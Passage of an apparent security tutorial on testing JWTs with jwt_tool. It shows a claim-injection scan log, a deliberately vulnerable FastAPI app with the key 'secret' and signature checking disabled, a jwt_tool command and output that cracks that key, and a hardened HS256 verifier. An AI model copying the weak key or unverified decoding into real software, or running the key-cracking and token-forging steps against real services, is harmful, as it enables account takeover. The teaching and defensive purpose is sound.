jwttool_4e2efb402cb5909e4bc6ce61b383517a Injected False into Common Payload Claim: c_hash Response Code: 403, 43 bytes
jwttool_0423b1591de9868f5166257951b639f0 Injected False into Common Payload Claim: acr Response Code: 403, 43 bytes
jwttool_0b1f1653313a99966bc1add81accef96 Injected False into Common Payload Claim: amr Response Code: 403, 43 bytes
jwttool_4c5d227c4b852c0a0aea265ac959299b Injected False into Common Payload Claim: sub_jwk Response Code: 403, 43 bytes
jwttool_48e9dd7effc2dd92ad229cb6a9e6ee39 Injected False into Common Payload Claim: cnf Response Code: 403, 43 bytes
jwttool_98c06f6f7c6ca6f40a10e6d36759f06c Injected False into Common Payload Claim: sip_from_tag Response Code: 403, 43 bytes
jwttool_f5fc037de660b6596a75962f111f396b Injected False into Common Payload Claim: sip_date Response Code: 403, 43 bytes
jwttool_024179e0de1bb279357b961d932cb7a0 Injected False into Common Payload Claim: sip_callid Response Code: 403, 43 bytes
jwttool_98040e9c7a76cd4e24a39537fca5093a Injected False into Common Payload Claim: sip_cseq_num Response Code: 403, 43 bytes
jwttool_6102c21dfde0000f91552bbe904b8b21 Injected False into Common Payload Claim: sip_via_branch Response Code: 403, 43 bytes
jwttool_30f1d2ad5b0f52312bef2c380948d621 Injected False into Common Payload Claim: orig Response Code: 403, 43 bytes
jwttool_da695167243ba2c84b11639edd26f38b Injected False into Common Payload Claim: dest Response Code: 403, 43 bytes
jwttool_1dc47603b4913adcb9fb236b33ccac17 Injected False into Common Payload Claim: mky Response Code: 403, 43 bytes
jwttool_fb3423ddb59ce94bc2ead6425747e1dc Injected False into Common Payload Claim: events Response Code: 403, 43 bytes
jwttool_436b2604047215526d4a3f0d4a019ade Injected False into Common Payload Claim: toe Response Code: 403, 43 bytes
jwttool_0a7c9d6f3233b94515a672814a4d0a17 Injected False into Common Payload Claim: txn Response Code: 403, 43 bytes
jwttool_02d87ef6a9376255c94cd8b0c3dd7871 Injected False into Common Payload Claim: rph Response Code: 403, 43 bytes
jwttool_d49c0c1d96f7dd8cba2ba94112601207 Injected False into Common Payload Claim: sid Response Code: 403, 43 bytes
jwttool_f540f97ab6fc7e8a0cc1378244cdcabc Injected False into Common Payload Claim: vot Response Code: 403, 43 bytes
jwttool_778ff26fa71f9c2b3821f766d083efdd Injected False into Common Payload Claim: vtm Response Code: 403, 43 bytes
jwttool_0e2dba1d29abb1c879f3dea0ed23f828 Injected False into Common Payload Claim: attest Response Code: 403, 43 bytes
jwttool_50a8c37368b65fc0fd3ed9a99a3730d5 Injected False into Common Payload Claim: origid Response Code: 403, 43 bytes
jwttool_cfa842b29e2377c3c07bb7bebaaa3fb3 Injected False into Common Payload Claim: act Response Code: 403, 43 bytes
jwttool_1a1c1c01a5237bc345cb329c351ad121 Injected False into Common Payload Claim: scope Response Code: 403, 43 bytes
jwttool_5ba5b182f3628bfac3f70aa1b1ff0a9e Injected False into Common Payload Claim: client_id Response Code: 403, 43 bytes
jwttool_156aa259c82b3fd5dce58f4df3d15c56 Injected False into Common Payload Claim: may_act Response Code: 403, 43 bytes
jwttool_e2a5d9edd5e70e8354f764d58271deb3 Injected False into Common Payload Claim: jcard Response Code: 403, 43 bytes
jwttool_97057aac7c11c9e81703e22eae197d49 Injected False into Common Payload Claim: at_use_nbr Response Code: 403, 43 bytes
jwttool_a98d17263e5cd45c85644b469d3e2fdc Injected False into Common Payload Claim: div Response Code: 403, 43 bytes
jwttool_b6894ee9dfd6d47b847cab646a6a2d09 Injected False into Common Payload Claim: opt Response Code: 403, 43 bytes
jwttool_a77df295f4ac29d6cdc4d58308345c21 Injected jwt_tool into Common Header Claim: typ Response Code: 403, 43 bytes
jwttool_10a1ae55678e05dd19fcfe15f521d8b2 Injected jwt_tool into Common Header Claim: jku Response Code: 403, 43 bytes
jwttool_b9e530fc24d0590ae2559a5a2858dfc2 Injected jwt_tool into Common Header Claim: kid Response Code: 403, 43 bytes
jwttool_d76b1c5f2e9f0b25a1d6699ae7539296 Injected jwt_tool into Common Header Claim: x5u Response Code: 403, 43 bytes
jwttool_b0f64b5a87eded53510c5bae48caabca Injected jwt_tool into Common Header Claim: x5t Response Code: 403, 43 bytes
jwttool_1a21238153bf4b97bf45781fa304249a Injected jwt_tool into Common Payload Claim: iss Response Code: 403, 43 bytes
jwttool_52ab9961ba2be5708b71affeb9acd8a2 Injected jwt_tool into Common Payload Claim: sub Response Code: 403, 43 bytes
jwttool_70f86874925527b25602b896c7cbf911 Injected jwt_tool into Common Payload Claim: aud Response Code: 403, 43 bytes
jwttool_1bacaf3cc478455afdda0ec39bc2c78d Injected jwt_tool into Common Payload Claim: exp Response Code: 403, 43 bytes
jwttool_6647c0f8d03d93e05cc7574dae8984bb Injected jwt_tool into Common Payload Claim: nbf Response Code: 403, 43 bytes
jwttool_23cec0291026873b968b35e54d7ee4ea Injected jwt_tool into Common Payload Claim: iat Response Code: 403, 43 bytes
jwttool_838d5555200827135b913cbc3d5123a3 Injected jwt_tool into Common Payload Claim: jti Response Code: 403, 43 bytes
jwttool_11250595d282067e29d132fba5afb9d4 Injected jwt_tool into Common Payload Claim: name Response Code: 403, 43 bytes
jwttool_b71f8328fbd4b4b831feb459606e38fa Injected jwt_tool into Common Payload Claim: given_name Response Code: 403, 43 bytes
jwttool_bb2a1fddbbba58ef52ec5b441687629b Injected jwt_tool into Common Payload Claim: family_name Response Code: 403, 43 bytes
jwttool_3eaef49c2d7c8a5a7d2ac44e456fc113 Injected jwt_tool into Common Payload Claim: middle_name Response Code: 403, 43 bytes
jwttool_a209168693cd3af9ab22e6e8d1c7be5b Injected jwt_tool into Common Payload Claim: nickname Response Code: 403, 43 bytes
jwttool_b5aa1f501816fc3943f9040cdce81417 Injected jwt_tool into Common Payload Claim: preferred_username Response Code: 403, 43 bytes
jwttool_77bed657b5a8fd879fd1ddf66ffbaa49 Injected jwt_tool into Common Payload Claim: profile Response Code: 403, 43 bytes
jwttool_f1f6aec697b41ffa6e124e91bb914387 Injected jwt_tool into Common Payload Claim: picture Response Code: 403, 43 bytes
jwttool_c2fb7d302bc717bc0acdf7a5d761e91a Injected jwt_tool into Common Payload Claim: website Response Code: 403, 43 bytes
jwttool_980a6b51672b62b4da963cbc3f55783e Injected jwt_tool into Common Payload Claim: email Response Code: 403, 43 bytes
jwttool_efea37dfa04c9d56c6d4393d464e6d21 Injected jwt_tool into Common Payload Claim: email_verified Response Code: 403, 43 bytes
jwttool_29bcfbc4d6ac4c98da7b5a2c42aa88a6 Injected jwt_tool into Common Payload Claim: gender Response Code: 403, 43 bytes
jwttool_635454a3f018639791f467454f53f89b Injected jwt_tool into Common Payload Claim: birthdate Response Code: 403, 43 bytes
jwttool_af04dd0781c9a79917557168e245314e Injected jwt_tool into Common Payload Claim: zoneinfo Response Code: 403, 43 bytes
jwttool_5ebac1d51563a090bd69e665ec32b1ea Injected jwt_tool into Common Payload Claim: locale Response Code: 403, 43 bytes
jwttool_5550064990753a04dcdcdefbeedd3e5d Injected jwt_tool into Common Payload Claim: phone_number Response Code: 403, 43 bytes
jwttool_c0f233babacfbba564ec6674d79aff10 Injected jwt_tool into Common Payload Claim: phone_number_verified Response Code: 403, 43 bytes
jwttool_7f065b636b6a8810de35d5767cf79c1b Injected jwt_tool into Common Payload Claim: address Response Code: 403, 43 bytes
jwttool_bd1b10c9b2535f5e231be8fc5abd0911 Injected jwt_tool into Common Payload Claim: updated_at Response Code: 403, 43 bytes
jwttool_f85cd5f4899ab6819a8f70f9e9066344 Injected jwt_tool into Common Payload Claim: azp Response Code: 403, 43 bytes
jwttool_64e33e3a3808ebe784f02a0afbc73438 Injected jwt_tool into Common Payload Claim: nonce Response Code: 403, 43 bytes
jwttool_493b408aaf41fbfba2c5c606af49d551 Injected jwt_tool into Common Payload Claim: auth_time Response Code: 403, 43 bytes
jwttool_41394509e00460540945a4c151eaf709 Injected jwt_tool into Common Payload Claim: at_hash Response Code: 403, 43 bytes
jwttool_ed6b94a4eeeade77b4ed3073c1db5eaf Injected jwt_tool into Common Payload Claim: c_hash Response Code: 403, 43 bytes
jwttool_5d91db11e417ced9d05986229bae92eb Injected jwt_tool into Common Payload Claim: acr Response Code: 403, 43 bytes
jwttool_1730b38b585c599b2074800da8ec9322 Injected jwt_tool into Common Payload Claim: amr Response Code: 403, 43 bytes
jwttool_74d4269eafec80defc3e436a7ee590ea Injected jwt_tool into Common Payload Claim: sub_jwk Response Code: 403, 43 bytes
jwttool_708855091612c873414529d435aae1cd Injected jwt_tool into Common Payload Claim: cnf Response Code: 403, 43 bytes
jwttool_c3b317d5c129fcac52e03a02d324e1b3 Injected jwt_tool into Common Payload Claim: sip_from_tag Response Code: 403, 43 bytes
jwttool_ffa19dde9c233203a3d0909f26396cf8 Injected jwt_tool into Common Payload Claim: sip_date Response Code: 403, 43 bytes
jwttool_b023025f50c41547e932a40c206e009e Injected jwt_tool into Common Payload Claim: sip_callid Response Code: 403, 43 bytes
jwttool_d95d0d9b26d5471c28663d420eeb3b33 Injected jwt_tool into Common Payload Claim: sip_cseq_num Response Code: 403, 43 bytes
jwttool_5a127a1c98b41ad40cf47bd67fee6541 Injected jwt_tool into Common Payload Claim: sip_via_branch Response Code: 403, 43 bytes
jwttool_84aa45f4121bbcb9f1dae62ddf676acb Injected jwt_tool into Common Payload Claim: orig Response Code: 403, 43 bytes
jwttool_ee519c0c0aee9ec0198fca52062c4613 Injected jwt_tool into Common Payload Claim: dest Response Code: 403, 43 bytes
jwttool_9620c7d10d466e0516f0012eae1a06ef Injected jwt_tool into Common Payload Claim: mky Response Code: 403, 43 bytes
jwttool_eff1794701639e28d7222f9f59c29b45 Injected jwt_tool into Common Payload Claim: events Response Code: 403, 43 bytes
jwttool_3eac72c156d616580b725613c4b4fd36 Injected jwt_tool into Common Payload Claim: toe Response Code: 403, 43 bytes
jwttool_52186265aef878bf4de1517d5030bdc1 Injected jwt_tool into Common Payload Claim: txn Response Code: 403, 43 bytes
jwttool_05df06246b75617f3de19d967a772ea7 Injected jwt_tool into Common Payload Claim: rph Response Code: 403, 43 bytes
jwttool_7a79b832f9ad352ba2bc8764b4abd0ab Injected jwt_tool into Common Payload Claim: sid Response Code: 403, 43 bytes
jwttool_b441a9036b69cc0b01c7da0af40b32b6 Injected jwt_tool into Common Payload Claim: vot Response Code: 403, 43 bytes
jwttool_f710bf5677bdfc42a2d7facec25fb79e Injected jwt_tool into Common Payload Claim: vtm Response Code: 403, 43 bytes
jwttool_2594ec29987985dda1e7606f58ab7e75 Injected jwt_tool into Common Payload Claim: attest Response Code: 403, 43 bytes
jwttool_b9f5106d10b6e34950e0a16ef75706b3 Injected jwt_tool into Common Payload Claim: origid Response Code: 403, 43 bytes
jwttool_142ce1784ecd95f7b897177b7822c8c5 Injected jwt_tool into Common Payload Claim: act Response Code: 403, 43 bytes
jwttool_942a32ade5ea74204bf06651a009ebb5 Injected jwt_tool into Common Payload Claim: scope Response Code: 403, 43 bytes
jwttool_c3b3cb59f2f8840d6661a76f711c5037 Injected jwt_tool into Common Payload Claim: client_id Response Code: 403, 43 bytes
jwttool_e0364b3782eca84f88d361e7638fa6c0 Injected jwt_tool into Common Payload Claim: may_act Response Code: 403, 43 bytes
jwttool_db48bdbb9ed6a09f051da3e3f7c813a6 Injected jwt_tool into Common Payload Claim: jcard Response Code: 403, 43 bytes
jwttool_8511ff4736ef818e95eb39a1efe4b57d Injected jwt_tool into Common Payload Claim: at_use_nbr Response Code: 403, 43 bytes
jwttool_4c76379fbf074e05f8583a7c35a44735 Injected jwt_tool into Common Payload Claim: div Response Code: 403, 43 bytes
jwttool_19c8fe77a3c4e1b770e638665ab4d149 Injected jwt_tool into Common Payload Claim: opt Response Code: 403, 43 bytes
jwttool_bbe57a9da867ce92bd5aa2785f22d977 Injected 0 into Common Header Claim: typ Response Code: 403, 43 bytes
jwttool_bc50a870b14cc817e577361f8882b755 Injected 0 into Common Header Claim: jku Response Code: 403, 43 bytes
jwttool_1d3548ad1641e9f21b04bc80d254aa28 Injected 0 into Common Header Claim: kid Response Code: 403, 43 bytes
jwttool_726ff84ebc5768e034177ab17a9ce908 Injected 0 into Common Header Claim: x5u Response Code: 403, 43 bytes
jwttool_74c456dc2ed2a46c299361ecaec17828 Injected 0 into Common Header Claim: x5t Response Code: 403, 43 bytes
jwttool_378f7e0f721b1e7e52984f4d7d6ee2d9 Injected 0 into Common Payload Claim: iss Response Code: 403, 43 bytes
jwttool_cd77e0ef14dc739d620f61f598d9712b Injected 0 into Common Payload Claim: sub Response Code: 403, 43 bytes
jwttool_198c63dcddb15863e364408cd72a435a Injected 0 into Common Payload Claim: aud Response Code: 403, 43 bytes
jwttool_a760e69f3e0ee28af1b12f6a17f13560 Injected 0 into Common Payload Claim: exp Response Code: 403, 43 bytes
jwttool_10e4b936e431534aad40b3eb9996df6c Injected 0 into Common Payload Claim: nbf Response Code: 403, 43 bytes
jwttool_57eeb8de95222a2360250f2620291d69 Injected 0 into Common Payload Claim: iat Response Code: 403, 43 bytes
jwttool_20ac0073e6288d2ffe70d82d882437ec Injected 0 into Common Payload Claim: jti Response Code: 403, 43 bytes
jwttool_5646bd5902899b181dca2d18d69dbd3a Injected 0 into Common Payload Claim: name Response Code: 403, 43 bytes
jwttool_d063e2aeca1f23be12d185cc3714c0c3 Injected 0 into Common Payload Claim: given_name Response Code: 403, 43 bytes
jwttool_62560bc1c47b6240ef1149573bd20484 Injected 0 into Common Payload Claim: family_name Response Code: 403, 43 bytes
jwttool_f91e4bc0162b7e96dd5aaf08ab8bd992 Injected 0 into Common Payload Claim: middle_name Response Code: 403, 43 bytes
jwttool_335d8ef0cc92d96604bf23498c88a439 Injected 0 into Common Payload Claim: nickname Response Code: 403, 43 bytes
jwttool_e98d1bfac07f5f9cef0cf0fdd3348252 Injected 0 into Common Payload Claim: preferred_username Response Code: 403, 43 bytes
jwttool_daa2739b28d14fc4a8424e9651a28a6f Injected 0 into Common Payload Claim: profile Response Code: 403, 43 bytes
jwttool_125a010a1949c3b26b16f544c99f815e Injected 0 into Common Payload Claim: picture Response Code: 403, 43 bytes
jwttool_65904495266e7509c10c5f99b0b7a06f Injected 0 into Common Payload Claim: website Response Code: 403, 43 bytes
jwttool_dcbad6838d613937435082f897cda892 Injected 0 into Common Payload Claim: email Response Code: 403, 43 bytes
jwttool_9a54e6e0bb54147884a265d590b6f056 Injected 0 into Common Payload Claim: email_verified Response Code: 403, 43 bytes
jwttool_90f455dde2f9706247fe1b542ed48115 Injected 0 into Common Payload Claim: gender Response Code: 403, 43 bytes
jwttool_8b61a4f56426b6e2069b2453a1713b4b Injected 0 into Common Payload Claim: birthdate Response Code: 403, 43 bytes
jwttool_77693081a736d7cabca5a5c07c524cd9 Injected 0 into Common Payload Claim: zoneinfo Response Code: 403, 43 bytes
jwttool_aa4202112a1f94803b5ee688a2ee8339 Injected 0 into Common Payload Claim: locale Response Code: 403, 43 bytes
jwttool_0e7a093e7184d711b585df68655cfac1 Injected 0 into Common Payload Claim: phone_number Response Code: 403, 43 bytes
jwttool_8ad95c4b97c6321716ac5482c8846591 Injected 0 into Common Payload Claim: phone_number_verified Response Code: 403, 43 bytes
jwttool_5ed9a013e193ea2b7c2190b37fda206a Injected 0 into Common Payload Claim: address Response Code: 403, 43 bytes
jwttool_d548d92a6d5e237d2ae0c05a0b974c71 Injected 0 into Common Payload Claim: updated_at Response Code: 403, 43 bytes
jwttool_d819ebb53f9ae0be35b62a9f19d4fd1d Injected 0 into Common Payload Claim: azp Response Code: 403, 43 bytes
jwttool_2ff57bc3f0fb31422f79a2cf982f7478 Injected 0 into Common Payload Claim: nonce Response Code: 403, 43 bytes
jwttool_5238e6a6d866d2320b3419270b4a73ff Injected 0 into Common Payload Claim: auth_time Response Code: 403, 43 bytes
jwttool_8ce6856252e6f6304715364f9414ccda Injected 0 into Common Payload Claim: at_hash Response Code: 403, 43 bytes
jwttool_83d10e50f206a1fea26c3441a05a3ca2 Injected 0 into Common Payload Claim: c_hash Response Code: 403, 43 bytes
jwttool_555b470cfc22eab8780e3aa486b581d1 Injected 0 into Common Payload Claim: acr Response Code: 403, 43 bytes
jwttool_dcdd20e6f4bca3187b34788b9956fe80 Injected 0 into Common Payload Claim: amr Response Code: 403, 43 bytes
jwttool_85e8b4cc7cbe126c35f34f671a874f83 Injected 0 into Common Payload Claim: sub_jwk Response Code: 403, 43 bytes
jwttool_05222ffc0185710566083f6872d32dc2 Injected 0 into Common Payload Claim: cnf Response Code: 403, 43 bytes
jwttool_71a075d91863e23355439f0c6e979d81 Injected 0 into Common Payload Claim: sip_from_tag Response Code: 403, 43 bytes
jwttool_122e420fce938de272b5f324344a3135 Injected 0 into Common Payload Claim: sip_date Response Code: 403, 43 bytes
jwttool_516941bb2c143edabbd37d6c1b97327b Injected 0 into Common Payload Claim: sip_callid Response Code: 403, 43 bytes
jwttool_03b8f0260b8da145a69a46b0ea320776 Injected 0 into Common Payload Claim: sip_cseq_num Response Code: 403, 43 bytes
jwttool_7a4d9fcc6d8030860b200d36ea8db610 Injected 0 into Common Payload Claim: sip_via_branch Response Code: 403, 43 bytes
jwttool_45f0a4edde919a889f5779c291caf0e0 Injected 0 into Common Payload Claim: orig Response Code: 403, 43 bytes
jwttool_50eee88c26d2b21b319e628a4b6487df Injected 0 into Common Payload Claim: dest Response Code: 403, 43 bytes
jwttool_ff0ab02106b84d728ee38f672a25a70d Injected 0 into Common Payload Claim: mky Response Code: 403, 43 bytes
jwttool_8a4a6453f5b918cc8ca5cf5ed0d5a85c Injected 0 into Common Payload Claim: events Response Code: 403, 43 bytes
jwttool_28d15db77e70104c49e825cf376f0254 Injected 0 into Common Payload Claim: toe Response Code: 403, 43 bytes
jwttool_df378470de9cd5551a49d38b915953a9 Injected 0 into Common Payload Claim: txn Response Code: 403, 43 bytes
jwttool_7d731051b47d9fdde63768f4fab2d7a9 Injected 0 into Common Payload Claim: rph Response Code: 403, 43 bytes
jwttool_6d7bfe8e53cb8e79d74619ce77c0402e Injected 0 into Common Payload Claim: sid Response Code: 403, 43 bytes
jwttool_3cae096884cdabbd57e93719432e4e1e Injected 0 into Common Payload Claim: vot Response Code: 403, 43 bytes
jwttool_f2e789c96bbb71cf9288b6b399908536 Injected 0 into Common Payload Claim: vtm Response Code: 403, 43 bytes
jwttool_e466ca7a1fc49228fe0b8836c95d63b1 Injected 0 into Common Payload Claim: attest Response Code: 403, 43 bytes
jwttool_c234beeea42fe5846e822fb95514311f Injected 0 into Common Payload Claim: origid Response Code: 403, 43 bytes
jwttool_7a7585cdb42b8fc2d062c6041f4d2736 Injected 0 into Common Payload Claim: act Response Code: 403, 43 bytes
jwttool_4bfd386d0ed2fcc9c8ddef660076050e Injected 0 into Common Payload Claim: scope Response Code: 403, 43 bytes
jwttool_5cfd6ab8ef163382b0cb6e2cf101e674 Injected 0 into Common Payload Claim: client_id Response Code: 403, 43 bytes
jwttool_2b1a10c2200ca648af4ed6206dab4202 Injected 0 into Common Payload Claim: may_act Response Code: 403, 43 bytes
jwttool_2431962c3c776cd48d6b071cc28bac97 Injected 0 into Common Payload Claim: jcard Response Code: 403, 43 bytes
jwttool_e83c33bcb5ffb0d3bd94818dda8894ac Injected 0 into Common Payload Claim: at_use_nbr Response Code: 403, 43 bytes
jwttool_a6d040a0b4f224dd42084b4b1524141d Injected 0 into Common Payload Claim: div Response Code: 403, 43 bytes
jwttool_fb32dd51900ef0a20fd527a7d94a0433 Injected 0 into Common Payload Claim: opt Response Code: 403, 43 bytes
Scanning mode completed: review the above results.

What happens with a vulnerable app

For comparison, start a FastAPI app that deliberately uses weak JWT handling. The key is the easily guessed value secret, and on top of that /very-vulnerable-data disables signature verification.

```python
from fastapi import FastAPI, HTTPException, Response, Cookie
from datetime import datetime, timedelta, timezone
import jwt  # PyJWT

app = FastAPI(title="JWT Vulnerability Test with PyJWT")

SECRET_KEY = "secret"  # far too weak a key (deliberately, for this demo)
ALGORITHM = "HS256"


@app.post("/login")
def login(response: Response):
    expire = datetime.now(timezone.utc) + timedelta(minutes=30)
    to_encode = {"exp": expire, "sub": "123", "role": "user"}
    encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM)
    response.set_cookie(key="access_token", value=encoded_jwt)
    return {"message": "Logged in", "token": encoded_jwt}


@app.get("/secure-data")
def secure_data(access_token: str = Cookie(None)):
    if not access_token:
        raise HTTPException(status_code=401, detail="Token missing")
    try:
        # verifies the signature, but only with the weak key above
        payload = jwt.decode(access_token, SECRET_KEY, algorithms=[ALGORITHM])
        return {"message": "Success!", "user_data": payload}
    except jwt.PyJWTError:
        raise HTTPException(status_code=403, detail="Invalid token")


@app.get("/very-vulnerable-data")
def very_vulnerable_data(access_token: str = Cookie(None)):
    if not access_token:
        raise HTTPException(status_code=401, detail="Token missing")
    try:
        payload = jwt.decode(access_token, options={"verify_signature": False})  # does not verify the signature
        return {"message": "Vulnerable Success", "user_data": payload}
    except jwt.PyJWTError:
        raise HTTPException(status_code=403, detail="Invalid token")
```

Running jwt_tool against this app's /secure-data, the key is recovered instantly by matching it against the bundled dictionary (jwt-common.txt).

```
% python jwt_tool.py -M at -t http://localhost:8000/secure-data -rc "access_token=eyJhbG...(省略)" -np

Testing HS256 token against common JWT secrets (jwt-common.txt)
[+] secret is the CORRECT key!
You can tamper/fuzz the token contents (-T/-I) and sign it using:
python3 jwt_tool.py [options here] -S hs256 -p "secret"
(the rest of the scan output is omitted)
```

A key like secret is found immediately because it is in the "common keys" list that ships with jwt_tool.

```
% cat jwt-common.txt | grep -x secret
secret
```

Once the key is found, an attacker can re-sign a tampered JWT with a valid signature. /very-vulnerable-data, which sets verify_signature=False, does not look at the signature at all, so tokens can be forged at will.

Warning

  • HS256 keys should be long enough that they cannot be guessed.
  • Disabling signature verification with verify_signature=False is out of the question.
  • In production, a public-key scheme such as RS256 / EdDSA is safer.
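To make the Warning above concrete, here is an added example (not code from this page, and not the PyJWT or jwt_tool API) that implements HS256 verification with only the standard library and shows what each of the three mistakes costs. It pins the algorithm server-side, compares the MAC in constant time, requires exp, and refuses to start with a secret that is too short or appears in a wordlist. COMMON_SECRETS is a constructed stand-in for jwt-common.txt, and the function names (check_hs256_secret, sign_hs256, decode_unverified, verify_hs256, demo) are this example's own. decode_unverified is what verify_signature=False amounts to: the payload is trusted without checking anything, so a swapped payload or an alg=none token is accepted, while verify_hs256 rejects both.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import List, Optional

# Constructed stand-in for jwt_tool's jwt-common.txt (not the real list).
COMMON_SECRETS = {"secret", "password", "123456", "changeme", "jwt_secret"}

# RFC 7518 section 3.2: an HS256 key MUST be at least 256 bits (32 bytes).
MIN_HS256_KEY_BYTES = 32


def check_hs256_secret(secret: str) -> List[str]:
    """Return the problems found with a secret; an empty list means it is acceptable."""
    problems = []
    if secret in COMMON_SECRETS:
        problems.append("secret is in the common-secrets wordlist")
    if len(secret.encode()) < MIN_HS256_KEY_BYTES:
        problems.append(f"secret is shorter than {MIN_HS256_KEY_BYTES} bytes")
    return problems


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _segment(obj: dict) -> str:
    return _b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload: dict, secret: str) -> str:
    """Issue a compact JWS with HS256 (the legitimate server side)."""
    signing_input = _segment({"alg": "HS256", "typ": "JWT"}) + "." + _segment(payload)
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(sig)


def decode_unverified(token: str) -> dict:
    """Equivalent of verify_signature=False: returns the payload without any check."""
    _, payload_b64, _ = token.split(".")
    return json.loads(_b64url_decode(payload_b64))


def verify_hs256(token: str, secret: str, now: Optional[int] = None) -> dict:
    """Hardened verification: algorithm allowlist, constant-time MAC compare, mandatory exp."""
    now = int(time.time()) if now is None else now
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    # The server decides the algorithm; the token header never does (rejects alg=none).
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise ValueError("algorithm not allowed")
    expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    payload = json.loads(_b64url_decode(payload_b64))
    exp = payload.get("exp")
    if not isinstance(exp, int) or exp <= now:
        raise ValueError("token expired or missing exp")
    return payload


def demo(now: int = 1_700_000_000) -> dict:
    """Constructed walkthrough: how each verifier treats a good, a tampered, an unsigned and an expired token."""
    key = secrets.token_urlsafe(48)  # 64 URL-safe chars, well above the 32-byte minimum
    claims = {"sub": "123", "role": "user", "exp": now + 1800}
    good = sign_hs256(claims, key)
    # Payload swapped to role=admin while the original signature is kept.
    header_b64, _, sig_b64 = good.split(".")
    tampered = header_b64 + "." + _segment(dict(claims, role="admin")) + "." + sig_b64
    # alg=none token with an empty signature segment.
    none_alg = _segment({"alg": "none", "typ": "JWT"}) + "." + _segment(dict(claims, role="admin")) + "."
    expired = sign_hs256(dict(claims, exp=now - 1), key)

    def outcome(tok: str) -> str:
        try:
            return verify_hs256(tok, key, now=now)["role"]
        except ValueError as exc:
            return f"rejected: {exc}"

    return {
        "weak_secret_problems": check_hs256_secret("secret"),
        "good": outcome(good),
        "tampered_unverified": decode_unverified(tampered)["role"],
        "tampered_verified": outcome(tampered),
        "none_unverified": decode_unverified(none_alg)["role"],
        "none_verified": outcome(none_alg),
        "expired": outcome(expired),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Running check_hs256_secret at application startup and refusing to boot on a non-empty result is the cheapest way to keep a value like secret out of production; the demo shows that the same token which decode_unverified happily reports as role=admin is rejected by verify_hs256 as a bad signature.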